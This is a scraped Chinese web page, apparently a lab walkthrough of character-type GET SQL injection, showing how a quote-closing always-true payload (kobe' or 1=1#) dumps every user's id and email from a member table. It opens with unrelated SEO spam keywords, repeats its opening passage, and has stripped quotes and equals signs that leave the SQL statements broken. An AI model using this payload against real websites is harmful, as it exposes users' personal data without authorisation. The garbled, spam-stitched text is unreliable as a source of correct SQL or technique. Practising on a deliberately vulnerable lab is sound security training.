泰州做网站的公司,做搜狗pc网站快速,沈阳男科私立医院,长乐网站建设SQL注入-字符型(get)
输入kobe查询出现id和邮箱
猜测语句,字符在数据库中需要用到单引号或者双引号
select 字段1,字段2 from 表名 where usernamekobe;在数据库中查询对应的kobe#xff0c;根据上图对应上。
select id,email from member where usernamekobe;编写payload语…SQL注入-字符型(get)
输入kobe查询出现id和邮箱
猜测语句,字符在数据库中需要用到单引号或者双引号
select 字段1,字段2 from 表名 where usernamekobe;在数据库中查询对应的kobe根据上图对应上。
select id,email from member where usernamekobe;编写payload语句添加or 11#
select id,email from member where usernamekobe;
需要添加单引号闭合前面的单引号后面的单引号需要用到井号进行注释掉或者用--注释
select id,email from member where usernamekobe or 11#;在搜索框中输入语句为
kobe or 11#如图所示所有用户信息展示出来。
通过前端输入条件传参到后端数据库的配置文件逻辑
